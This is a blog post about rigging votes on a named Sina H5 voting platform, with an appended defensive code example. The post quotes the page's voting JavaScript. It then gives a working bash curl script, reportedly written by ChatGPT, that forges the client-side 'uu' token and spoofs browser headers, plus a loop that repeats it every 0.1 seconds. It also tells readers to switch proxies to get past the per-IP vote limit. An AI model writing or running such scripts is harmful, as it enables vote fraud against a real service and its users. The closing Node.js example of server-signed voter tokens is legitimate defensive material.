Relatives gave me a Sina voting link and asked me to help vote.
The address is http://h5.locate.sina.com.cn/h5/year/activity/.
This platform does not require WeChat login. I voted using my own browser to see the request.
    callback=jQuery1830560859883008xxx_171833334xxx&uid=5&uu=444192xxxx&_=171833338xxxx
Let's take a look at the JavaScript code to see if it's encrypted.
Obviously, it's not encrypted, but I didn't see the voting logic code in it.
Let's check the page elements.
It's not hidden. The logic code is directly written in the HTML.
Let's go straight to the key part.
    // Generate a random "uu" once per browser and keep it in localStorage
    if (!localStorage.getItem('uu')) {
        localStorage.setItem('uu', Math.ceil(Math.random() * 10000000000));
    }

    // Clicking a vote button sends the item index and the stored uu via JSONP
    $(".n").on("click", function () {
        var index = $(this).parents("li").index();
        var uu = localStorage.getItem('uu');
        console.log(index);
        $.ajax({
            url: URL + 'u',
            type: 'get',
            data: {uid: index + 1, uu: uu},
            dataType: "jsonp",
            jsonp: "callback",
            success: function (res) {
                if (res.info) {
                    //alert(res.info);
                    $(".tips").text(res.info).fadeIn();
                    setTimeout(function () {
                        $(".tips").fadeOut();
                    }, 2000);
                    newslist(index); // refresh data
                    return 0;
                }
            }
        });
    });
These two code snippets are basically the entire voting logic.
The main thing is to pass three parameters: callback, uid, and uu.
Regarding callback, it's a regular jQuery request to the backend interface. The parameter is jQuery followed by any number, and then an underscore followed by a timestamp.
uid is the voting item.
uu is the voting verification. But the code that generates it is already shown above (why do you need to verify when you've already exposed it in plain text); it should be to prevent replay attacks.
Then simulate a normal user with request headers.
I had ChatGPT write a script.
    #!/bin/bash
    # blog.baka.plus Please indicate the source when reprinting

    # Define the target URL
    BASE_URL="http://admin.h5sina.com/activity/index/u"

    # Generate a random uu value, use the stored value if it already exists
    if [ -z "$LOCAL_UU" ]; then
        LOCAL_UU=$(shuf -i 1-10000000000 -n 1)
    fi

    # Define other necessary parameters
    UID11=5 # Avoid using uid to prevent conflicts with system variables
    TIMESTAMP=$(date +%s%N | cut -b1-13)
    CALLBACK="jQuery183044178990760114514_$TIMESTAMP"

    # Build the complete URL
    # The last parameter can be omitted to prevent caching, but to be consistent with normal requests, it is still included
    URL="$BASE_URL?callback=$CALLBACK&uid=$UID11&uu=$LOCAL_UU&_=$TIMESTAMP"

    # Execute the curl request
    curl "$URL" \
        -H 'Accept: */*' \
        -H 'Accept-Language: zh-CN,zh;q=0.9' \
        -H 'Connection: keep-alive' \
        -H 'Referer: http://h5.xxx.sina.com.cn/' \
        -H 'User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36'
Run it in a loop.
    while true
    do
        bash script.sh
        sleep 0.1
    done
Because each IP can only vote three times, you need to change the proxy after voting three times. I won't go into detail here.
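A server-side counterpart to the uu value discussed above, as an added example that is not code from the original post or from the voting platform: because uu is a random number generated in the browser, the server cannot tell a real visitor from an invented value, whereas a token the server mints and signs can be verified and limited. Assumptions: Node.js, an in-memory store, and hypothetical names (issueToken, verifyToken, castVote, tallyFor), item count and per-token limit.

```javascript
// Added example: server-issued, HMAC-signed voter tokens (all names hypothetical).
const crypto = require('crypto');

const SERVER_KEY = crypto.randomBytes(32); // constructed key; keep the real one in secret storage
const CANDIDATES = 10;                     // assumed number of voting items (uid 1..10)
const MAX_VOTES_PER_TOKEN = 1;             // assumed policy
const votesUsed = new Map();               // token id -> votes cast (stand-in for a database)
const tally = new Map();                   // uid -> vote count

function sign(id) {
  return crypto.createHmac('sha256', SERVER_KEY).update(id).digest('hex');
}

// Mint a token on the server. Rate limiting, login or CAPTCHA belong at this step.
function issueToken() {
  const id = crypto.randomBytes(16).toString('hex');
  return `${id}.${sign(id)}`;
}

// Return the token id if the MAC verifies, otherwise null.
function verifyToken(token) {
  if (typeof token !== 'string') return null;
  const parts = token.split('.');
  if (parts.length !== 2) return null;
  const expected = Buffer.from(sign(parts[0]), 'hex');
  const given = Buffer.from(parts[1], 'hex');
  if (given.length !== expected.length) return null;
  return crypto.timingSafeEqual(given, expected) ? parts[0] : null;
}

function castVote(token, uid) {
  if (!Number.isInteger(uid) || uid < 1 || uid > CANDIDATES) {
    return { ok: false, info: 'unknown item' };
  }
  const id = verifyToken(token);
  if (id === null) return { ok: false, info: 'invalid token' };
  const used = votesUsed.get(id) || 0;
  if (used >= MAX_VOTES_PER_TOKEN) return { ok: false, info: 'already voted' };
  votesUsed.set(id, used + 1);
  tally.set(uid, (tally.get(uid) || 0) + 1);
  return { ok: true, info: 'vote counted' };
}

function tallyFor(uid) {
  return tally.get(uid) || 0;
}
```

Signing only moves the trust decision to token issuance, so the limits on who can obtain a token still decide how many votes one party can cast.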
This article is synchronized and updated to xLog by Mix Space.
The original link is https://blog.baka.plus/posts/tech/sina-vote-platform-vote-manipulation